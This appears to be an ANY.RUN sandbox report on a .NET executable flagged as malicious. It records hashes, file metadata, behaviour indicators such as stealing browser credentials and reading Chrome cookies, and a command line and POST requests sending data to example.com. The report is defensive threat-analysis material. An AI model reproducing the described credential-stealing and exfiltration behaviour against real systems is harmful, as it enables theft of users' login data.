File name:

ap2.exe.bin

Full analysis: https://app.any.run/tasks/fde28a0e-0374-40f7-8621-2d10bd645564
Verdict: Malicious activity
Analysis date: February 13, 2024, 13:56:03
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:

578F549C0B0AB0D89B20C0E013F6F191

SHA1:

181903232313A98AFF0997DF59A12C6213C9BF6F

SHA256:

556C1A7D3F1079F58CDC2BAE4EEF63FFEB6C75D7B262DC502D87CF54760785A7

SSDEEP:

1536:+2s3arn0Btob8WhF4FHsfxq8rlevVQyli/0003fEimbyxKBJFqMd:Iob8YOhaxqlQEi/CCqMd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • ap2.exe.bin.exe (PID: 2944)

    • Steals credentials from Web Browsers

      • ap2.exe.bin.exe (PID: 2944)

    • Actions looks like stealing of personal data

      • ap2.exe.bin.exe (PID: 2944)

  • SUSPICIOUS

    • Searches for installed software

      • ap2.exe.bin.exe (PID: 2944)

  • INFO

    • Checks supported languages

      • ap2.exe.bin.exe (PID: 2944)

    • Reads the computer name

      • ap2.exe.bin.exe (PID: 2944)

    • Reads product name

      • ap2.exe.bin.exe (PID: 2944)

    • Reads Environment values

      • ap2.exe.bin.exe (PID: 2944)

    • Checks proxy server information

      • ap2.exe.bin.exe (PID: 2944)

    • Reads the machine GUID from the registry

      • ap2.exe.bin.exe (PID: 2944)

    • Creates files or folders in the user directory

      • ap2.exe.bin.exe (PID: 2944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (72.2)
.scr | Windows screen saver (12.9)
.dll | Win32 Dynamic Link Library (generic) (6.4)
.exe | Win32 Executable (generic) (4.4)
.exe | Generic Win/DOS Executable (1.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2090:05:16 05:54:02+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 48
CodeSize: 106496
InitializedDataSize: 1536
UninitializedDataSize: -
EntryPoint: 0x1be7e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows command line
FileVersionNumber: 1.0.0.0
ProductVersionNumber: 1.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: -
CompanyName: -
FileDescription: ConsoleApp
FileVersion: 1.0.0.0
InternalName: pg20.exe
LegalCopyright: Copyright © 2024
LegalTrademarks: -
OriginalFileName: pg20.exe
ProductName: ConsoleApp
ProductVersion: 1.0.0.0
AssemblyVersion: 1.0.0.0
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
125
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start ap2.exe.bin.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
956\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeap2.exe.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2944"C:\Users\admin\Desktop\ap2.exe.bin.exe" 1234 http://www.example.comC:\Users\admin\Desktop\ap2.exe.bin.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
ConsoleApp
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\ap2.exe.bin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
1 655
Read events
1 619
Write events
24
Delete events
12

Modification events

(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:writeName:Owner
Value:
800B0000044E166D845EDA01
(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:writeName:SessionHash
Value:
70D1DC2AD113971AC4053DB24307BBFB626FF626E5DF8CF792034B1F384401BF
(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:writeName:Sequence
Value:
1
(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:writeName:RegFiles0000
Value:
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:writeName:RegFilesHash
Value:
54851FC83D6080E1124EDDE295F194B7870A848DF3838999876AC95AB3AB4693
(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:delete valueName:RegFilesHash
Value:
蕔젟怽丒랔ઇ趄菳馉檇嫉ꮳ鍆
(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:delete valueName:RegFiles0000
Value:
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:delete valueName:Sequence
Value:

(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:delete valueName:SessionHash
Value:
텰⫝̸Ꮡ᪗ׄ눽݃﮻潢⛶�ΒὋ䐸뼁
(PID) Process:(2944) ap2.exe.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:delete valueName:Owner
Value:
Executable files
0
Suspicious files
7
Text files
3
Unknown types
4

Dropped files

PID
Process
Filename
Type
2944ap2.exe.bin.exeC:\Users\admin\AppData\Roaming\8ea3ab06-0b6a-4f5a-becb-a445990e0170sqlite
MD5:1E1F96F03DCB32CBEDE6A33AF67A44A7
SHA256:B6DCEC10039FBA99019A6DE818D433847EFAD62FAE59851E328EC42396DFD9CB
2944ap2.exe.bin.exeC:\Users\admin\AppData\Roaming\e475eb0b-1e2b-4db1-92c3-d14783152129sqlite
MD5:D1E2CC958F3468CD339F7CF98054155A
SHA256:B8D3722E417B1B55A84E56B3F0EC629B1B6FD49449825B7E8CBA2B4C43375D25
2944ap2.exe.bin.exeC:\Users\admin\AppData\Roaming\70ff8ac4-df69-41dd-9d07-1d0d74273b90sqlite
MD5:8D34776FC1EACFD6ABA3A108CBF0FB8F
SHA256:2EAD1DB169EFF6E2F2390A4D9440700740FDD012B681A94C60AEC0B378D8FE56
2944ap2.exe.bin.exeC:\Users\admin\AppData\Roaming\cb6c9bc7-71c9-4cbb-8f42-915699b1f742sqlite
MD5:DEF0831A3EBF657C17EAD677A282B855
SHA256:BACA43D995D5591730EFA286EC9CDB537AB3C12A9A58C93461DD470D128AAED0
2944ap2.exe.bin.exeC:\Users\admin\AppData\Roaming\8214e2cc-2bb4-463a-9a19-08b03bb329ecsqlite
MD5:6168CB69AD6E0632ECC72B426935525B
SHA256:8F2B9ECF4559FD208046D653370BD577F4793C4BB7CE3B8E00B90E3FC00FA478
2944ap2.exe.bin.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\ap2.exe.bin.exe.logtext
MD5:7326F06814CC423B8DA98B318D2A341A
SHA256:3FDAE5FAC36077B6190B2F5D8BC11575741DEA0C87A7781D47F1BB6A0F878D61
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
6
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
20.223.35.26:443
https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:AC7699B0-48EA-FD22-C8DC-06A02098A0F0&ctry=US&time=20240213T135608Z&lc=en-US&pl=en-US&idtp=mid&uid=9115d6d1-9f4e-4053-9297-2a8c833b3912&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=f133d543bf214eda862ea54abd0ab6ed&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=133529005600000000&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19044.1288&disphorzres=1280&dispsize=15.3&dispvertres=720&fosver=16299&isu=0&lo=3384355&metered=false&nettype=ethernet&npid=sc-310091&oemName=DELL&oemid=DELL&ossku=Professional&prevosver=15063&rver=2&smBiosDm=DELL&stabedgever=111.0.1661.62&tl=2&tsu=774885&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=2
unknown
1.34 Kb
POST
200
20.190.159.23:443
https://login.live.com/RST2.srf
unknown
xml
9.93 Kb
POST
200
20.190.159.23:443
https://login.live.com/RST2.srf
unknown
xml
9.93 Kb
POST
200
40.126.31.73:443
https://login.live.com/RST2.srf
unknown
9.93 Kb
POST
20.190.159.68:443
https://login.live.com/RST2.srf
unknown
1764
backgroundTaskHost.exe
GET
200
20.223.36.55:443
https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:AC7699B0-48EA-FD22-C8DC-06A02098A0F0&ctry=US&time=20240213T135608Z&lc=en-US&pl=en-US&idtp=mid&uid=9115d6d1-9f4e-4053-9297-2a8c833b3912&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=1e5c0c630b1a451a83f29065cc461be0&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=137271744000000000&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19044.1288&disphorzres=1280&dispsize=15.3&dispvertres=720&fosver=16299&isu=0&lo=3384355&metered=false&nettype=ethernet&npid=sc-88000045&oemName=DELL&oemid=DELL&ossku=Professional&prevosver=15063&smBiosDm=DELL&stabedgever=111.0.1661.62&tl=2&tsu=774885&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=2
unknown
binary
3.14 Kb
POST
200
20.190.159.0:443
https://login.live.com/RST2.srf
unknown
10.9 Kb
2944
ap2.exe.bin.exe
POST
200
93.184.216.34:80
http://www.example.com/
unknown
html
1.23 Kb
unknown
GET
40.127.169.103:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19044.1288/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.1288&MK=DELL&MD=DELL
unknown
2944
ap2.exe.bin.exe
POST
200
93.184.216.34:80
http://www.example.com/
unknown
html
1.23 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1764
backgroundTaskHost.exe
20.223.36.55:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
whitelisted
2944
ap2.exe.bin.exe
93.184.216.34:80
www.example.com
EDGECAST
US
whitelisted
5300
SIHClient.exe
20.114.59.183:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown

DNS requests

Domain
IP
Reputation
arc.msn.com
  • 20.223.36.55
whitelisted
www.example.com
  • 93.184.216.34
whitelisted
slscr.update.microsoft.com
  • 20.114.59.183
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
ap2.exe.bin